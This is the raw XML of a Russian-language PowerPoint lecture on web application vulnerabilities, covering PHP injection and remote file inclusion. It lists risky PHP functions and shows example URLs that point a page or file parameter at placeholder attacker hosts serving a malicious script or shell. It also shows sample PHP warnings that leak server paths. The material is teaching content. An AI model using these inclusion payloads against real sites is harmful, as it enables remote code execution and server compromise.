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5"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId16"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="345" r:id="rId8"/>
    <p:sldId id="351" r:id="rId9"/>
    <p:sldId id="349" r:id="rId10"/>
    <p:sldId id="352" r:id="rId11"/>
    <p:sldId id="304" r:id="rId12"/>
    <p:sldId id="305" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
  </p:sldIdLst>
  <p:sldSz cx="20108863" cy="11310938"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="RF Dewi" panose="00000500000000000000" charset="-52"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="RF Dewi Extended" panose="00000505000000000000" charset="-52"/>
      <p:regular r:id="rId21"/>
      <p:bold r:id="rId22"/>
      <p:italic r:id="rId23"/>
      <p:boldItalic r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="TT Positive" panose="020B0003020000020203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EA3F3B"/>
    <a:srgbClr val="26242C"/>
    <a:srgbClr val="212121"/>
    <a:srgbClr val="26242D"/>
    <a:srgbClr val="387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3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Уязвимости </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>приложений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PHPi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круг, логотип, Шрифт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DED035A0-AA2B-ABBC-9751-213C4445D02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847" t="-46513" r="1" b="-56706"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9656064" y="795338"/>
            <a:ext cx="8966897" cy="9756775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4FC851-3F38-ACD3-80FF-E0566A1F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311495"/>
            <a:ext cx="8084311" cy="89466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PHPi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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9DB3BA-67B2-D560-96DB-424B5EC279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eval(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>include(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>require(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>create_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>().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503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22CA4-8913-44B5-1D20-469BB16F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PHPi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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FF0A47-9DD3-B188-34CA-974C175E9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8" y="2093044"/>
            <a:ext cx="7479902" cy="1678856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051322-5DD5-A805-8249-EA77387066BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693738" y="4114800"/>
            <a:ext cx="1289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: //www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>атакуемый_сайт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>атакующий_серв</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>вредоносный_скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>txt?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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C537CD-F7A5-33A5-A0EF-6826A697E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8" y="4998152"/>
            <a:ext cx="9914986" cy="167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03754-702A-2233-DB51-1B28B661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RFI</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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4E5D8-7B25-0524-D01C-06BE880A498E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128713" y="1571625"/>
            <a:ext cx="1080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: //www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>атакуемый_сервер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>com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index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=main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BD8AB-8662-11C7-5F81-07B63CA302A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128713" y="1571625"/>
            <a:ext cx="10801350" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBEBEB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http : //www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>атакуемый_сервер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>com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index.php?page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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd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60737-E90D-C780-9F17-DFD3FD86AB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8372475" y="3596784"/>
            <a:ext cx="11122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`Warning : main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ): failed to open stream : No such file or directory in / home / user / www [//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>](https://page.php/) on line 3`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`Warning : main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ): failed to open stream : No such file or directory in / home / user / www / page . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on line 3`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`Warning : main (): Failed opening "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" for inclusion (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = ".:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/share/pear" ) in / home / user / www / page . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on line 3`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A4A92-129D-D52B-413C-A56A586F30DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128712" y="7376269"/>
            <a:ext cx="11515725" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBEBEB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http : //www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>атакуемый_сервер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>com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index.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>сайт_злоумышленника</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com/shell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58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7663</TotalTime>
  <Words>259</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Произвольный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7</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="20" baseType="lpstr">
      <vt:lpstr>RF Dewi</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>TTPositive-DemiBold</vt:lpstr>
      <vt:lpstr>TT Positive</vt:lpstr>
      <vt:lpstr>RF Dewi Extended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PHPi</vt:lpstr>
      <vt:lpstr>PHPi</vt:lpstr>
      <vt:lpstr>RFI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121</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-12T13:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-17T14:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>